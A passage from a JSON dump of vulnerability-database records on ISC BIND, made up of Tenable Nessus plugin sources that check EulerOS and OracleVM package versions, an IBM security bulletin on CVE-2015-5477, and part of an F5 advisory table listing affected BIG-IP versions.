issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1433\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?72d96ad2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bind packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-3143\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:bind-libs-lite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:bind-license\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"bind-libs-9.9.4-61.1.h2\",\n \"bind-libs-lite-9.9.4-61.1.h2\",\n \"bind-license-9.9.4-61.1.h2\",\n \"bind-utils-9.9.4-61.1.h2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-03-27T15:42:17", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Fix CVE-2017-3136 (ISC change 4575)\n\n - Fix CVE-2017-3137 (ISC change 4578)\n\n - Fix and test caching CNAME before DNAME (ISC change 4558)\n\n - Fix CVE-2016-9147 (ISC change 4510)\n\n - Fix regression introduced by CVE-2016-8864 (ISC change 4530)\n\n - Restore SELinux contexts before named restart\n\n - Use /lib or /lib64 only if directory in chroot already exists\n\n - Tighten NSS library pattern, escape chroot mount path\n\n - Fix (CVE-2016-8864)\n\n - Do not change lib permissions in chroot (#1321239)\n\n - Support WKS records in chroot (#1297562)\n\n - Do not include patch backup in docs (fixes #1325081 patch)\n\n - Backported relevant parts of [RT #39567] (#1259923)\n\n - Increase ISC_SOCKET_MAXEVENTS to 2048 (#1326283)\n\n - Fix multiple realms in nsupdate script like upstream (#1313286)\n\n - Fix multiple realm in nsupdate script (#1313286)\n\n - Use resolver-query-timeout high enough to recover all forwarders (#1325081)\n\n - Fix (CVE-2016-2848)\n\n - Fix infinite loop in start_lookup (#1306504)\n\n - Fix (CVE-2016-2776)", "cvss3": {"score": 8.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"}, "published": "2017-04-21T00:00:00", "type": "nessus", "title": "OracleVM 3.3 / 3.4 : bind (OVMSA-2017-0066)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-4095", "CVE-2007-2241", "CVE-2007-2925", "CVE-2007-2926", "CVE-2007-6283", "CVE-2008-0122", "CVE-2008-1447", "CVE-2009-0025", "CVE-2009-0696", "CVE-2010-0097", "CVE-2010-0290", "CVE-2011-0414", "CVE-2011-1910", "CVE-2011-2464", "CVE-2012-1033", "CVE-2012-1667", "CVE-2012-3817", "CVE-2012-4244", "CVE-2012-5166", "CVE-2012-5688", "CVE-2012-5689", "CVE-2013-2266", "CVE-2013-4854", "CVE-2014-0591", "CVE-2014-8500", "CVE-2015-1349", "CVE-2015-4620", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704", "CVE-2016-1285", "CVE-2016-1286", "CVE-2016-2776", "CVE-2016-2848", "CVE-2016-8864", "CVE-2016-9147", "CVE-2017-3136", "CVE-2017-3137"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bind-libs", "p-cpe:/a:oracle:vm:bind-utils", "cpe:/o:oracle:vm_server:3.3", "cpe:/o:oracle:vm_server:3.4"], "id": "ORACLEVM_OVMSA-2017-0066.NASL", "href": "https://www.tenable.com/plugins/nessus/99569", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0066.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99569);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-4095\", \"CVE-2007-2241\", \"CVE-2007-2925\", \"CVE-2007-2926\", \"CVE-2007-6283\", \"CVE-2008-0122\", \"CVE-2008-1447\", \"CVE-2009-0025\", \"CVE-2009-0696\", \"CVE-2010-0097\", \"CVE-2010-0290\", \"CVE-2011-0414\", \"CVE-2011-1910\", \"CVE-2011-2464\", \"CVE-2012-1033\", \"CVE-2012-1667\", \"CVE-2012-3817\", \"CVE-2012-4244\", \"CVE-2012-5166\", \"CVE-2012-5688\", \"CVE-2012-5689\", \"CVE-2013-2266\", \"CVE-2013-4854\", \"CVE-2014-0591\", \"CVE-2014-8500\", \"CVE-2015-1349\", \"CVE-2015-4620\", \"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-8000\", \"CVE-2015-8704\", \"CVE-2016-1285\", \"CVE-2016-1286\", \"CVE-2016-2776\", \"CVE-2016-2848\", \"CVE-2016-8864\", \"CVE-2016-9147\", \"CVE-2017-3136\", \"CVE-2017-3137\");\n script_bugtraq_id(19859, 25037, 27283, 30131, 33151, 35848, 37118, 37865, 46491, 48007, 48566, 51898, 53772, 54658, 55522, 55852, 56817, 57556, 58736, 61479, 64801, 71590, 72673, 75588);\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"OracleVM 3.3 / 3.4 : bind (OVMSA-2017-0066)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix CVE-2017-3136 (ISC change 4575)\n\n - Fix CVE-2017-3137 (ISC change 4578)\n\n - Fix and test caching CNAME before DNAME (ISC change\n 4558)\n\n - Fix CVE-2016-9147 (ISC change 4510)\n\n - Fix regression introduced by CVE-2016-8864 (ISC change\n 4530)\n\n - Restore SELinux contexts before named restart\n\n - Use /lib or /lib64 only if directory in chroot already\n exists\n\n - Tighten NSS library pattern, escape chroot mount path\n\n - Fix (CVE-2016-8864)\n\n - Do not change lib permissions in chroot (#1321239)\n\n - Support WKS records in chroot (#1297562)\n\n - Do not include patch backup in docs (fixes #1325081\n patch)\n\n - Backported relevant parts of [RT #39567] (#1259923)\n\n - Increase ISC_SOCKET_MAXEVENTS to 2048 (#1326283)\n\n - Fix multiple realms in nsupdate script like upstream\n (#1313286)\n\n - Fix multiple realm in nsupdate script (#1313286)\n\n - Use resolver-query-timeout high enough to recover all\n forwarders (#1325081)\n\n - Fix (CVE-2016-2848)\n\n - Fix infinite loop in start_lookup (#1306504)\n\n - Fix (CVE-2016-2776)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-April/000681.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd826bc7\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-April/000680.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?67f77036\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind-libs / bind-utils packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16, 189, 200, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"bind-libs-9.8.2-0.62.rc1.el6_9.1\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"bind-utils-9.8.2-0.62.rc1.el6_9.1\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"bind-libs-9.8.2-0.62.rc1.el6_9.1\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"bind-utils-9.8.2-0.62.rc1.el6_9.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind-libs / bind-utils\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-17T14:18:37", "description": "The remote OracleVM system is missing necessary patches to address critical security updates : please see Oracle VM Security Advisory OVMSA-2020-0021 for details.", "cvss3": {"score": 6.8, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"}, "published": "2020-06-05T00:00:00", "type": "nessus", "title": "OracleVM 3.3 / 3.4 : bind (OVMSA-2020-0021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-4095", "CVE-2007-2241", "CVE-2007-2925", "CVE-2007-2926", "CVE-2007-6283", "CVE-2008-0122", "CVE-2008-1447", "CVE-2009-0025", "CVE-2009-0696", "CVE-2010-0097", "CVE-2010-0290", "CVE-2011-0414", "CVE-2011-1910", "CVE-2011-2464", "CVE-2012-1033", "CVE-2012-1667", "CVE-2012-3817", "CVE-2012-4244", "CVE-2012-5166", "CVE-2012-5688", "CVE-2012-5689", "CVE-2013-2266", "CVE-2013-4854", "CVE-2014-0591", "CVE-2014-8500", "CVE-2015-1349", "CVE-2015-4620", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704", "CVE-2016-1285", "CVE-2016-1286", "CVE-2016-2776", "CVE-2016-2848", "CVE-2016-8864", "CVE-2016-9147", "CVE-2017-3136", "CVE-2017-3137", "CVE-2017-3142", "CVE-2017-3143", "CVE-2017-3145", "CVE-2018-5740", "CVE-2018-5743", "CVE-2020-8616", "CVE-2020-8617"], "modified": "2022-05-16T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bind-libs", "p-cpe:/a:oracle:vm:bind-utils", "cpe:/o:oracle:vm_server:3.3", "cpe:/o:oracle:vm_server:3.4"], "id": "ORACLEVM_OVMSA-2020-0021.NASL", "href": "https://www.tenable.com/plugins/nessus/137170", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2020-0021.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(137170);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/16\");\n\n script_cve_id(\"CVE-2006-4095\", \"CVE-2007-2241\", \"CVE-2007-2925\", \"CVE-2007-2926\", \"CVE-2007-6283\", \"CVE-2008-0122\", \"CVE-2008-1447\", \"CVE-2009-0025\", \"CVE-2009-0696\", \"CVE-2010-0097\", \"CVE-2010-0290\", \"CVE-2011-0414\", \"CVE-2011-1910\", \"CVE-2011-2464\", \"CVE-2012-1033\", \"CVE-2012-1667\", \"CVE-2012-3817\", \"CVE-2012-4244\", \"CVE-2012-5166\", \"CVE-2012-5688\", \"CVE-2012-5689\", \"CVE-2013-2266\", \"CVE-2013-4854\", \"CVE-2014-0591\", \"CVE-2014-8500\", \"CVE-2015-1349\", \"CVE-2015-4620\", \"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-8000\", \"CVE-2015-8704\", \"CVE-2016-1285\", \"CVE-2016-1286\", \"CVE-2016-2776\", \"CVE-2016-2848\", \"CVE-2016-8864\", \"CVE-2016-9147\", \"CVE-2017-3136\", \"CVE-2017-3137\", \"CVE-2017-3142\", \"CVE-2017-3143\", \"CVE-2017-3145\", \"CVE-2018-5740\", \"CVE-2018-5743\", \"CVE-2020-8616\", \"CVE-2020-8617\");\n script_bugtraq_id(19859, 25037, 27283, 30131, 33151, 35848, 37118, 37865, 46491, 48007, 48566, 51898, 53772, 54658, 55522, 55852, 56817, 57556, 58736, 61479, 64801, 71590, 72673, 75588);\n\n script_name(english:\"OracleVM 3.3 / 3.4 : bind (OVMSA-2020-0021)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates : please see Oracle VM Security Advisory\nOVMSA-2020-0021 for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2020-June/000984.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2020-June/000981.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2020-June/000982.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected bind-libs / bind-utils packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2008-0122\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16, 189, 200, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"bind-libs-9.8.2-0.68.rc1.el6_10.7\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"bind-utils-9.8.2-0.68.rc1.el6_10.7\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"bind-libs-9.8.2-0.68.rc1.el6_10.7\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"bind-utils-9.8.2-0.68.rc1.el6_10.7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind-libs / bind-utils\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2021-12-30T21:52:07", "description": "## Summary\n\nBIND vulnerability disclosed by Internet Systems Consortium (ISC) affects IBM Netezza Host Management. IBM Netezza Host Management has addressed this CVE.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2015-5477](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477>) \n \n**DESCRIPTION:** ISC BIND is vulnerable to a denial of service, caused by an error in the handling of TKEY queries. By sending specially-crafted packets, a remote attacker could exploit this vulnerability to cause a REQUIRE assertion failure. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/105120> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nIBM Netezza Host Management 5.3.7.0 and previous releases\n\n## Remediation/Fixes\n\nIBM Netezza Host Management\n\n| _5.3.8.0_| [Link to Fix Central](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/Netezza+Platform&release=HOSTMGMT_5&platform=All&function=fixId&fixids=5.3.8.0-IM-Netezza-HOSTMGMT-fp101635&includeRequisites=1&includeSupersedes=0&downloadMethod=http&source=fc>) \n---|---|--- \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n21 August 2015: Original version published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSULQD\",\"label\":\"IBM PureData System\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"1.0.0\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {}, "published": "2019-10-18T03:10:29", "type": "ibm", "title": "Security Bulletin: Vulnerability in BIND affects IBM Netezza Host Management (CVE-2015-5477)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2019-10-18T03:10:29", "id": "1BE927991B41331733ECF7540C1316ECEB24FDB717143A7513A6233D44D77714", "href": "https://www.ibm.com/support/pages/node/535249", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "f5": [{"lastseen": "2017-06-08T00:16:31", "description": "\nF5 Product Development has assigned ID 534630 to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H535739 on the **Diagnostics **> **Identified **> **High **screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 11.6.0**1** \n11.0.0 - 11.5.3**1** \n10.1.0 - 10.2.4| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \n11.6.0**2 ** \n11.2.0 - 11.5.3**2 **| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n11.0.0 - 11.1.0 \n10.1.0 - 10.2.4| Severe| BIND \nBIG-IP AAM| 11.6.0**1** \n11.4.0 - 11.5.3**1**| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9| Severe| BIND \nBIG-IP AFM| 11.6.0**1** \n11.3.0 - 11.5.3**1**| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9| Severe| BIND \nBIG-IP Analytics| 11.6.0**1** \n11.0.0 - 11.5.3**1**| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15| Severe| BIND \nBIG-IP APM| 11.6.0**1** \n11.0.0 - 11.5.3**1** \n10.1.0 - 10.2.4| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP ASM| 11.6.0**1** \n11.0.0 - 11.5.3**1** \n10.1.0 - 10.2.4| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0**1** \n10.1.0 - 10.2.4| 11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP GTM| 11.6.0**1,2,3** \n11.0.0 - 11.5.3**1,2,3** \n10.1.0 - 10.2.4| 11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP Link Controller| 11.6.0**1,2,3** 